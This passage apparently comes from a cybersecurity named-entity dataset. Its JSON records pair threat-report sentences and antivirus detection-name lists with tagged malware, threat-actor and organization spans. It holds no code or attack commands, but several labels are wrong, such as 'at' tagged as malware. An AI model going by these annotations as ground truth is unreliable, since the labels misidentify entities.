Operation likely named for the debug string present in much of the Elise codebase since at least 2012: d:\\lstudio\\projects\\lotus\\…", "spans": {"ORGANIZATION: Palo Alto Networks": [[44, 62]], "THREAT_ACTOR: Lotus Blossom Operation": [[124, 147]], "MALWARE: Elise": [[205, 210]], "MALWARE: at": [[226, 228]]}, "info": {"id": "cyner2_train_005848", "source": "cyner2_train"}} {"text": "This particular SLocker variant is notable for being one of the first Android file-encrypting ransomware, and the first mobile ransomware to capitalize on the success of the previous WannaCry outbreak.", "spans": {"MALWARE: SLocker variant": [[16, 31]], "MALWARE: Android file-encrypting ransomware,": [[70, 105]], "MALWARE: mobile ransomware": [[120, 137]], "MALWARE: WannaCry": [[183, 191]]}, "info": {"id": "cyner2_train_005850", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.SWF.CVE-2016-4117.B Exploit-RTF.docswf.d Trojan.Mdropper Win32/Exploit.CVE-2016-4117.A TROJ_CVE20164117.A Exploit.SWF.CVE-2016-4117.B Exploit.Swf.CVE20164117.ecpjvq Exploit.SWF.CVE-2016-4117.B Exploit.SWF.CVE-2016-4117.B Exploit.SWF.1001 TROJ_CVE20164117.A Exploit-RTF.docswf.d RTF/Trojan.XBFM-4 TrojanDropper:Win32/CVE-2016-4117.A Exploit.SWF.CVE-2016-4117.B Exploit.SWF.CVE-2016-4117.B Trojan-Dropper.Win32.CVE-2016-4117 Malicious_Behavior.SB swf.exp.shellcode.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005851", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.WoletixC.Trojan Backdoor.Likseput.B3 Win32.Trojan.WisdomEyes.16070401.9500.9998 BKDR_LIKSPUT.SMR Trojan.Win32.A.Downloader.14336.AV Win32.Trojan.Spy.Wnmg Trojan.DownLoad2.44669 BKDR_LIKSPUT.SMR BehavesLike.Win32.Downloader.lm Backdoor:Win32/Likseput.B Win32/Backdoor.b78", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005852", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Androm.Win32.27371 Backdoor.W32.Androm.mAsy Trojan/Spy.Shiz.nct 
Win32.Trojan.Kryptik.qb Win.Trojan.Shifu-6330434-1 Trojan.DownLoader17.28342 Backdoor.Androm.fj TR/AD.Beaugrit.M.29 Trojan[Backdoor]/Win32.Androm Win32.Trojan-Ransom.TeslaCrypt.N SScope.Malware-Cryptor.Drixed Win32/Spy.Shiz.NCT Backdoor.Androm!fkBWkP4HCvw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005853", "source": "cyner2_train"}} {"text": "Currently, the trojan spy is still in development and is not spotted in-the-wild yet.", "spans": {}, "info": {"id": "cyner2_train_005854", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Prosti.AG8 BackDoor-DUG.a Trojan.DL.Delphi!PZt9n9YNSJ4 Hacktool.Rootkit W32/Delf.GRUM Win32/SillyDl.RUQ TROJ_DLOAD.SMMO Trojan.Scraze Trojan.Win32.Scar.cbyd Trojan.Win32.Downloader.723460 TrojWare.Win32.TrojanDownloader.Delf.~QEA Trojan.DownLoad.40151 TR/Dldr.Delf.uvk TROJ_DLOAD.SMMO BackDoor-DUG.a Backdoor.Win32.Prosti!IK TrojanDownloader.Delf.rui Backdoor:Win32/Prosti.AG Adware.ScreenBlaze Trojan/Win32.Scar Trojan-Downloader.Win32.Delf.uvk Hacktool.Rootkit Win32/Adware.ScreenBlaze.AA Backdoor.Win32.Prosti.xa Backdoor.Win32.Prosti W32/Delf.SCB!tr Downloader.Delf Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005855", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 BehavesLike.Win32.Downloader.nt Trojan:Win32/Uniemv.B Trojan/Win32.Cryptolocker.C301960 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005856", "source": "cyner2_train"}} {"text": "Turla macro maldoc - Embassy of the republic of Kazakhstan Helsinki.", "spans": {"MALWARE: Turla macro maldoc": [[0, 18]], "ORGANIZATION: Embassy of the republic of Kazakhstan Helsinki.": [[21, 68]]}, "info": {"id": "cyner2_train_005857", "source": "cyner2_train"}} {"text": "In late October, Proofpoint researchers identified and began tracking a financially-motivated threat actor group with access to banking 
Trojans and other malware, including Dridex, Ursnif, Tinba, and the point-of-sale POS malware AbaddonPOS with its loader, TinyLoader.", "spans": {"ORGANIZATION: Proofpoint researchers": [[17, 39]], "THREAT_ACTOR: threat actor group": [[94, 112]], "MALWARE: banking Trojans": [[128, 143]], "MALWARE: malware,": [[154, 162]], "MALWARE: Dridex, Ursnif, Tinba,": [[173, 195]], "MALWARE: the point-of-sale POS malware AbaddonPOS": [[200, 240]], "MALWARE: loader, TinyLoader.": [[250, 269]]}, "info": {"id": "cyner2_train_005859", "source": "cyner2_train"}} {"text": "On a regular basis for the past several months, we have observed the inclusion of QRAT in a number of spam campaigns.", "spans": {"MALWARE: QRAT": [[82, 86]], "THREAT_ACTOR: spam campaigns.": [[102, 117]]}, "info": {"id": "cyner2_train_005860", "source": "cyner2_train"}} {"text": "A backdoor also known as: Banker/W32.BestaFera.3193856 W32/Trojan.UWMZ-4840 Trojan.Win32.Depok.dsfkzn Troj.W32.Depok.akz!c BehavesLike.Win32.Dropper.wh Trojan/Win32.Depok Trojan.Heur.EDDAE3 Backdoor:Win32/Nioriglio.A Trojan.Depok!iA0ZBWd8EAg Trojan.Win32.Depok", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005862", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan-Downloader.Dluca.by Trojan.Downloader.Dluca-29 Trojan-Downloader.Win32.Dluca.by TrojWare.Win32.TrojanDownloader.Dluca.~D3 Dialer.Adultparty Trojan-Downloader.Win32.Dluca.dj!IK TrojanDownloader.Dluca.bg TrojanDownloader:Win32/Dluca.DK Win-Trojan/Dluca.94208 Trojan-Downloader.Win32.Dluca.dj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005863", "source": "cyner2_train"}} {"text": "The actors appear to have learned from our previous takedown and sinkholing of their Command and Control C2 infrastructure – Foudre incorporates new anti-takeover techniques in an attempt to avoid their C2 domains being sinkholed as we did in 2016.", "spans": {"THREAT_ACTOR: The actors": [[0, 10]], "SYSTEM: infrastructure": 
[[108, 122]], "ORGANIZATION: Foudre incorporates": [[125, 144]]}, "info": {"id": "cyner2_train_005864", "source": "cyner2_train"}} {"text": "On April 20, Proofpoint observed a targeted campaign focused on financial analysts working at top global financial firms operating in Russia and neighboring countries.", "spans": {"ORGANIZATION: Proofpoint": [[13, 23]], "THREAT_ACTOR: targeted campaign": [[35, 52]], "ORGANIZATION: financial analysts": [[64, 82]], "ORGANIZATION: global financial firms": [[98, 120]]}, "info": {"id": "cyner2_train_005865", "source": "cyner2_train"}} {"text": "The loader injects a DLL component found in its body into explorer.exe.", "spans": {"MALWARE: The loader": [[0, 10]]}, "info": {"id": "cyner2_train_005866", "source": "cyner2_train"}} {"text": "These key technologies allow RSA analysts to process massive datasets and find forensically interesting artifacts in near real-time and more quickly than using standard incident response processes.", "spans": {}, "info": {"id": "cyner2_train_005867", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Posmemdump.A8 TSPY_RAWPOS.SM Win32.Trojan.WisdomEyes.16070401.9500.9903 Infostealer.Rawpos!g1 TSPY_RAWPOS.SM Win.Trojan.RawPOS-1 Trojan.Win32.POSCardStealer.dqfnqc Trojan.Inject1.54360 TrojanSpy.POSCardStealer.e Trojan:Win32/MemCCDump.A!POS Trojan.POSMemDump Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005869", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.tc MSIL/Injector.TDS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005870", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32!O Backdoor.Takit W32/Recerv.a.dr Trojan.Heur.E5D728 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Zyxerv Backdoor.Win32.Takit Trojan.Win32.Invader.euuocd Trojan.Win32.Z.Takit.135680 Backdoor.W32.Takit!c Backdoor.Win32.Takit.A 
BackDoor.TakeIt.1 W32/Recerv.a.dr Backdoor/Takit.a BDS/RedCap.xurnc Trojan/Win32.Invader Backdoor.Win32.Takit Backdoor.Takit Win32/Takit.A Win32.Backdoor.Takit.Wrgr Trojan.Win32.Takit W32/RECERV.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005871", "source": "cyner2_train"}} {"text": "A backdoor also known as: BehavesLike:Win32.Malware", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005872", "source": "cyner2_train"}} {"text": "A backdoor also known as: Python/Motovilo.A Win32.Worm.Motovilo.Hvjc Win32.HLLW.Motovilo.2 BehavesLike.Win32.Trojan.tc Python/Motovilo.A!worm Trojan:Win32/Motve.A Trj/CI.A Win32/Trojan.09a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005873", "source": "cyner2_train"}} {"text": "Whether its Exploit Kits or SPAM messages threat actors are pushing as many different variants of Ransomware as possible.", "spans": {"MALWARE: Exploit Kits": [[12, 24]], "THREAT_ACTOR: threat actors": [[42, 55]], "MALWARE: Ransomware": [[98, 108]]}, "info": {"id": "cyner2_train_005874", "source": "cyner2_train"}} {"text": "Our new intelligence on BlackEnergy expands previous findings on the first wide-scale coordinated attack against industrial networks.", "spans": {"THREAT_ACTOR: BlackEnergy": [[24, 35]]}, "info": {"id": "cyner2_train_005875", "source": "cyner2_train"}} {"text": "The country is resource rich, with a variety of natural resources and a steady labor supply.", "spans": {}, "info": {"id": "cyner2_train_005877", "source": "cyner2_train"}} {"text": "ince mid-2016 we have observed multiple new samples of the Android Adware family Ewind", "spans": {"MALWARE: the Android Adware family Ewind": [[55, 86]]}, "info": {"id": "cyner2_train_005880", "source": "cyner2_train"}} {"text": "Organizations in 31 countries have been targeted in a new wave of attacks which has been underway since at least October 2016.", "spans": {"ORGANIZATION: Organizations": [[0, 13]]}, "info": 
{"id": "cyner2_train_005881", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HLLW.Cloner Trojan.Vir.HLL Trojan.Heur.EA0E79 W32/HLLW.Cloner W32.Cloner PE_CLONER.A Virus.Win32.HLLW.Cloner Virus.Win32.HLLW.gcdu W32.HLLW.Cloner!c Win32.HLLW.Cloner Win32.HLLW.Cloner.32768 Virus.Cloner.Win32.1 PE_CLONER.A W32/Cloner.worm.a Virus.Win32.HLLW W32/HLLW.Cloner Virus/Win32.Cloner Virus.Win32.HLLW.Cloner W32/Cloner.worm.a W32/HLLW.SelfCloner Win32/HLLW.Cloner Win32.HLLW.Cloner", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005883", "source": "cyner2_train"}} {"text": "In this collaboration post with Morphisec Lab and Cisco s Research and Efficacy Team, we are now publishing details of this new document variant that makes use of an LNK embedded OLE object, which extracts a JavaScript bot from a document object, and injects a stealer DLL in memory using PowerShell.", "spans": {"ORGANIZATION: Morphisec Lab": [[32, 45]], "ORGANIZATION: Cisco s Research": [[50, 66]], "ORGANIZATION: Efficacy Team,": [[71, 85]], "MALWARE: variant": [[137, 144]], "MALWARE: JavaScript bot": [[208, 222]], "SYSTEM: PowerShell.": [[289, 300]]}, "info": {"id": "cyner2_train_005884", "source": "cyner2_train"}} {"text": "Alert from the CNCERT related to a piece of malware that is being used to perform DDoS attacks.", "spans": {"ORGANIZATION: CNCERT": [[15, 21]], "MALWARE: malware": [[44, 51]]}, "info": {"id": "cyner2_train_005885", "source": "cyner2_train"}} {"text": "A backdoor also known as: Troj.W32.Buzus.kZ4S BKDR_PHDET.SMI Win32.Trojan.WisdomEyes.16070401.9500.9959 BKDR_PHDET.SMI Trojan.Win32.A.Downloader.34304.CO BackDoor.Dax BehavesLike.Win32.FDoSBEnergy.nt W32.Trojan.Trojan-downloader.Ge Backdoor:Win32/Phdet.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005886", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Dedler.B Win32.Worm.Dedler.U Worm/W32.Dedler.38400.B Win32.Worm.Dedler.U W32/Dedler.c 
Win32.Worm.Dedler.U W32.Dedler.Worm Win32/Dedler.E WORM_DEDLER.C Win.Worm.Dedler-12 Win32.Worm.Dedler.U Net-Worm.Win32.Dedler.c Win32.Worm.Dedler.U Trojan.Win32.Dedler.frkx Worm.Win32.S.Net-Dedler.38400 W32.W.Dedler.c!c Win32.Worm-net.Dedler.Ahok Win32.Worm.Dedler.U Worm.Win32.Dedler.E Win32.Worm.Dedler.U Trojan.DownLoader.198 Worm.Dedler.Win32.19 BehavesLike.Win32.Downloader.nc Net-Worm.Win32.Dedler W32/Dedler.B.unp Worm/Dedler.c Worm:Win32/Dedler.B WORM/Dedler.G Worm[Net]/Win32.Dedler Worm:Win32/Dedler.B Net-Worm.Win32.Dedler.c Trojan/Win32.Horst.R28469 Worm.Dedler Backdoor.Dedler.E W32/ICQ.Smvss.A!tr Win32/Worm.352", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005887", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Snojan Trojan.Strictor.D43F0 Win.Trojan.Ag-1 Trojan.Win32.Snojan.kbr Trojan.Win32.DownLoad3.csckao Trojan.Win32.Z.Strictor.268488 Troj.W32.Snojan!c Trojan.DownLoad3.30879 Trojan/Invader.kbu TR/Spy.182784.101 Trojan/Win32.Invader TrojanDropper:Win32/Coopop.B Trojan.Win32.Snojan.kbr Trojan.Snojan Win32.Trojan.Snojan.Llhd Trojan-Banker.Win32.Banker Win32/Trojan.67a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005889", "source": "cyner2_train"}} {"text": "A backdoor also known as: Multi.Threats.InArchive Worm.Win32.Poswauto W64/Trojan.LELA-7925 WORM/Poswauto.gwore Worm:Win32/Poswauto.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005891", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware03 Trojan.Win32.Pakes!O TSPY_SUKWIDON.C Win32.Trojan.WisdomEyes.16070401.9500.9998 Infostealer.Sofacy Win32/Metlar.A TSPY_SUKWIDON.C Win.Trojan.Sofacy-1 Trojan.Win32.Pakes.qcb Trojan.Win32.Pakes.fizzg Win32.Trojan.Pakes.Pdmf Trojan.KillProc.7386 Trojan.Pakes.Win32.11534 BehavesLike.Win32.Mydoom.nc Trojan/Win32.Pakes Win32.Troj.Unknown.c.kcloud PWS:Win32/Sukwidon.A Trojan.TDss.20 Troj.W32.Pakes.qcb!c Trojan.Win32.Pakes.qcb 
Trojan/Win32.Xema.C81978 Trojan.Qhost Trojan.DR.Tiny!eZN8HfCUlLI Trojan.Win32.Sasfis W32/Malware_fam.NB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005892", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Downloader Win32/Exploit.CVE-2017-8570.A TROJ_CVE20170199.JVU Exploit.Xml.CVE-2017-0199.equmby PPT.S.Exploit.35022 Trojan[Exploit]/Win32.CVE-2017-8570 Trojan.Win32.Exploit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005893", "source": "cyner2_train"}} {"text": "Ironically the decoy document is a flyer concerning the Cyber Conflict U.S. conference organized by the NATO Cooperative Cyber Defence Centre of Excellence on 7-8 November 2017 at Washington, D.C. Due to the nature of this document, we assume that this campaign targets people with an interest in cyber security.", "spans": {"ORGANIZATION: the Cyber Conflict U.S. conference": [[52, 86]], "ORGANIZATION: the NATO Cooperative Cyber Defence Centre of Excellence on": [[100, 158]], "THREAT_ACTOR: campaign": [[253, 261]], "ORGANIZATION: cyber security.": [[297, 312]]}, "info": {"id": "cyner2_train_005894", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.AutoRun.110592.V Worm.Win32.AutoRun!O Win32.Worm.VB.rp Win.Worm.Autorun-7819 Worm.Win32.AutoRun.hvo Trojan.Win32.AutoRun.ubuid Win32.Worm.Autorun.Aihq Win32.HLLW.Autoruner1.8766 Worm.AutoRun.Win32.41616 BehavesLike.Win32.BadFile.ch Worm.Win32.AutoRun Worm/AutoRun.alsp Worm/Win32.AutoRun Worm:Win32/Krangtor.A Trojan.Heur.VP2.gm0faiC9QKoi Worm.Win32.A.AutoRun.87040.A Worm.AutoRun Win32/AutoRun.VB.AJW Worm.AutoRun!P7D8pPa150U", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005898", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Malachite.A W32.WLKSM.A1 Virus.WLKSM.Win32.1 Win32.Malachite.A Win32.Virus.MoonRover.a W32/Malachite.A Virus.Win32.MoonRover Virus.Win32.WLKSM.a Virus.Win32.Infector.dleseh Virus.Win32.WLKSM.AA 
BehavesLike.Win32.Virut.cc W32/Malachite.A Win32.Malachite.A Virus.Win32.WLKSM.a Win32.Malachite.A Win32.Malachite.A Win32.Malachite.A Virus.Win32.Wlksm.c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005899", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Otlard.A W32/Smalltroj.YCPZ Virus.Win32.Heur.c TROJ_OTLARD.SM Trojan-Dropper.Win32.Otlard!IK BackDoor.Gootkit.4 TROJ_OTLARD.SM Win32/Droplet.NU Backdoor/IEbooot.iz TrojanDropper:Win32/Otlard.A Trojan/Win32.Xema Rootkit.Otlard.aa Trojan-Dropper.Win32.Otlard", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005902", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.Fasong!O Trojan.Reconyc Worm.Fasong.Win32.10 Win32.Trojan-PSW.OLGames.bm W32/Worm.DPJC-5721 Trojan.PWS.QQPass WORM_FASONG.L Win.Trojan.Fasong-9 Trojan.Win32.Fsysna.djfi Trojan.Win32.Legmir.bonls Worm.Win32.A.Fasong.461667 Worm.Win32.Fasong.G Win32.HLLW.Fasong.7 WORM_FASONG.L BehavesLike.Win32.Virut.gh W32/Worm.AVIX Worm/Fasong.a W32.Worm.Fasong BDS/Delf.H Worm/Win32.Fasong Worm:Win32/Ming.A W32.W.Fasong.l6SH Trojan.Win32.Fsysna.djfi Trojan/Win32.HDC.C154421 Worm.Fasong Win32/Fasong.G Worm.Fasong!UQMX8yr/3P8 Worm.Win32.Fasong", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005904", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke/W32.BadJoke.561258 Trojan.Aduser.A4 Trojan/AddUser.t TROJ_GRAFTOR_EK2501C5.UVPM Win32.Trojan.AddUser.e TROJ_GRAFTOR_EK2501C5.UVPM Win32.Application.PUPStudio.A Trojan.Win32.Z.Graftor.561258 Worm.Win32.Dropper.RA Trojan.Adduser.216 Tool.BadJoke.Win32.3025 Trojan/Pasta.hsb TR/Winlock.KB Trojan.Graftor.D1E8A6 Trojan:Win32/Adduser.D Spyware.OnlineGames Win32/AddUser.T Win32.Trojan-psw.Badjoke.Taer Trojan.AddUser!BXWljasYS+k", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005906", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Blocker 
TROJ_PUWIN.A Win32.Trojan.WisdomEyes.16070401.9500.9979 TROJ_PUWIN.A Trojan-Ransom.Win32.Blocker.kgxt Trojan.Win32.Keylogger.evercw Trojan.Win32.Z.Blocker.17408.C Troj.Ransom.W32.Blocker!c Trojan.DownLoader25.58899 W32/Trojan.BMCJ-5014 Trojan.Blocker.hvt Trojan[Ransom]/Win32.Blocker Trojan:MSIL/Puwin.A Trojan-Ransom.Win32.Blocker.kgxt Trojan-Ransom.Blocker Trj/GdSda.A Win32.Trojan.Blocker.Tbsp Trojan.Blocker!xyv3gcnzFBI Trojan-Ransom.Win32.Blocker W32/Blocker.KGXT!tr Win32/Trojan.Ransom.460", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005911", "source": "cyner2_train"}} {"text": "A backdoor also known as: MemScan:Backdoor.Turkojan.DQ Backdoor.Turkojan Backdoor.Turkojan.Win32.25407 Win32.Backdoor.Cakl.c Backdoor.Trojan Win32/Turkojan.A HT_TURKOJAN_HA110001.UVPM Win.Trojan.Truko-10 Backdoor.Win32.Turkojan.zwh MemScan:Backdoor.Turkojan.DQ Trojan.Win32.Turkojan.jebp Win32.Backdoor.Turkojan.Wnwd MemScan:Backdoor.Turkojan.DQ Win32.HLLW.MyBot HT_TURKOJAN_HA110001.UVPM BackDoor-CZP.dr Trojan.Win32.Cakl Backdoor/Turkojan.x BDS/Turkojan.im Trojan[Backdoor]/Win32.Turkojan Backdoor:Win32/Turkojan.AI Backdoor.Turkojan.DQ Troj.W32.Buzus.l4J9 MemScan:Backdoor.Turkojan.DQ Backdoor/Win32.Turkojan.R148548 MemScan:Backdoor.Turkojan.DQ Trojan.SDP.27105 Win32/Cakl.NAG Backdoor.Turkojan.I Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005915", "source": "cyner2_train"}} {"text": "These unknown actors continued launching DDoS attacks over the next few years.", "spans": {"THREAT_ACTOR: unknown actors": [[6, 20]]}, "info": {"id": "cyner2_train_005916", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Brambul Troj.W32.Brambul.toT6 Win32/Pepex.F Trojan.Win32.Brambul.bp Worm.Win32.Pepex.E0 Win32.HLLW.Bumble BehavesLike.Win32.Downloader.mz Trojan:Win32/Brambul.A Trojan:Win32/Brambul.A!dha Trojan.Win32.Brambul.bp Win32/Tnega.WW Win32.Trojan.Brambul.Dvzk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_005917", "source": "cyner2_train"}} {"text": "First reports could be linked to Operation Aurora and dated back to 2009 2.", "spans": {"THREAT_ACTOR: Operation Aurora": [[33, 49]]}, "info": {"id": "cyner2_train_005918", "source": "cyner2_train"}} {"text": "A backdoor also known as: Sefnit.ab Trojan/Jorik.Gbot.cdb Trojan.Sefnit.2 TROJ_DLDR.SMII Win32.Trojan.WisdomEyes.16070401.9500.9938 Trojan.ADH.2 TROJ_DLDR.SMII Win.Trojan.Gbot-539 Trojan.Win32.Jorik.wkvaa Trojan.DownLoader4.46549 Trojan.Jorik.Win32.14116 BehavesLike.Win32.MultiPlug.tz Trojan/Win32.Gbot TrojanDownloader:Win32/Tegtomp.A Trojan/Win32.ADH.C90187 Trojan.Gbot Bck/Qbot.AO Trojan.DL.Tegtomp!ykAGemfy9WA W32/Buzus.AABB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005919", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.3DA4 Trojan/W32.Sasfis.432279 Trojan.Sasfis.Win32.35026 Win32.Trojan.Injector.jm Trojan.Win32.StartPage.ecbeu Trojan.Win32.A.Sasfis.432083 Troj.W32.Invader.liPS Trojan.StartPage.40117 BehavesLike.Win32.Sdbot.gc Trojan/Win32.Sasfis Trojan:Win32/Kilonepag.A Win32.Trojan.Killav.Losk Trojan.Sasfis!92bCxe6lda4 Win32/Trojan.48c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005920", "source": "cyner2_train"}} {"text": "Zscaler ThreatLabZ has been closely monitoring a new Spy Banker Trojan campaign that has been targeting Portuguese-speaking users in Brazil.", "spans": {"ORGANIZATION: Zscaler ThreatLabZ": [[0, 18]], "MALWARE: Spy Banker Trojan": [[53, 70]], "THREAT_ACTOR: campaign": [[71, 79]], "ORGANIZATION: Portuguese-speaking": [[104, 123]]}, "info": {"id": "cyner2_train_005922", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9989 Trojan.Win32.Kryptik.exgddi Trojange.N TR/Dropper.MSIL.hlkdw Trj/GdSda.A Msil.Trojan.Kryptik.Eyg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005923", "source": "cyner2_train"}} 
{"text": "A backdoor also known as: W32.OnGameAZPIXS.Trojan Trojan-Dropper.Win32.Dapato!O Dropper.Dapato.Win32.12031 Trojan.Delf.106 Trojan.Coinbitminer Win32/CoinMiner.AJ Trojan.Win32.Dapato.vksez Troj.Dropper.W32.Dapato.boht!c Trojan.Packed.194 TR/Kryptik.GZC Trojan[Dropper]/Win32.Dapato Trojan:Win32/Kexqoud.A TrojanDropper.Dapato Trojan.Injector!8vu2hFasaTU Trojan-Dropper.Win32.Dapato W32/Injector.URR!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005925", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.151026.9950.9999 Trojan-Downloader.Win32.Gootkit.kn Trojan.Packed Trojan.Kryptik.Win32.910183 BehavesLike.Win32.BadFile.cm W32/Trojan.TLOU-5726 TR/Renaz.ivfk W32/Gootkit.KN!tr.dldr Trojan/Win32.Inject Trojan.Win32.Crypt Crypt5.BVAN Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005926", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.ServerAJ.Trojan Trojan.Bublik.28294 Trojan.Zusy.Elzob.D833 TSPY_SASFIS_CD10021A.RDXN Win32.Backdoor.Naprat.d W32/Trojan2.MXXM Win32/Spyrat.B TSPY_SASFIS_CD10021A.RDXN Win.Trojan.Hupigon-28437 Trojan.Win32.Bublik.lkn Trojan.Win32.Bot.bblhdq Trojan.Win32.Bublik.lkn TrojWare.Win32.Naprat.A BackDoor.IRC.Bot.355 BehavesLike.Win32.Worm.cc Trojan/Naprat.c Trojan-GameThief.Win32.OnLineGames W32/Trojan.APHW-4252 Trojan/Win32.Sasfis Backdoor:Win32/Naprat.A Trojan.Win32.Bublik.lkn Win-Trojan/Antisb.190976.J Trojan.Bublik Win32/Naprat.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005927", "source": "cyner2_train"}} {"text": "Today, we have discovered more pieces of the puzzle: two more Corebot samples and an online crypt service.", "spans": {"MALWARE: Corebot": [[62, 69]]}, "info": {"id": "cyner2_train_005928", "source": "cyner2_train"}} {"text": "The modules analyzed by CTU researchers list recently accessed documents, enumerate installed programs, list recently visited websites, 
steal passwords, and steal installation files for the IDA tool.", "spans": {"ORGANIZATION: CTU researchers": [[24, 39]], "MALWARE: IDA tool.": [[190, 199]]}, "info": {"id": "cyner2_train_005929", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32.Sality!O Ransom_Natasa.R039C0DLB17 W32/Trojan.IPMQ-6780 Ransom_Natasa.R039C0DLB17 Trojan-Ransom.Satan Ransom:Win32/Natasa.A Trojan-Ransom.Win32.Satan.x Trj/CI.A W32/MBRlock.AP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005931", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Trojan.Onlinegames Troj.Gamethief.W32.Onlinegames!c Trojan-GameThief.Win32.OnLineGames.bnfw Trojan.Win32.OnLineGames.bwrpuv TrojWare.Win32.GameThief.OnLineGames.~bnfw Trojan.PWS.Qqpass.4325 Trojan-Dropper.Win32.Nemqe Trojan/Vilsel.dki Trojan[GameThief]/Win32.OnLineGames Trojan.Heur.ED351E Trojan-GameThief.Win32.OnLineGames.bnfw TrojanPSW.OnLineGames.a Win32.Trojan-gamethief.Onlinegames.Pfje Win32/Trojan.GameThief.844", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005932", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Cosmu.41472.E Backdoor.Begman.A Trojan/Cosmu.anpk Trojan.Autorun.3 Win32.Trojan.Delf.v W32.Begmian BKDR_BEGMA.SM Trojan.Cosmu.Win32.6467 BKDR_BEGMA.SM BehavesLike.Win32.Sality.pc BDS/Begman.cmnra Worm/Win32.AutoRun Backdoor:Win32/Begman.B Trojan/Win32.Cosmu.R11227 Trj/GdSda.A Trojan.Win32.Autorun.bwq Backdoor.Win32.Begman W32/Begma.SM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005933", "source": "cyner2_train"}} {"text": "The campaign, which experts believe is still in its early stages, targets Android OS devices.", "spans": {"THREAT_ACTOR: The campaign,": [[0, 13]], "SYSTEM: Android OS devices.": [[74, 93]]}, "info": {"id": "cyner2_train_005934", "source": "cyner2_train"}} {"text": "In addition, Sundown doesn't have the anti-crawling feature 
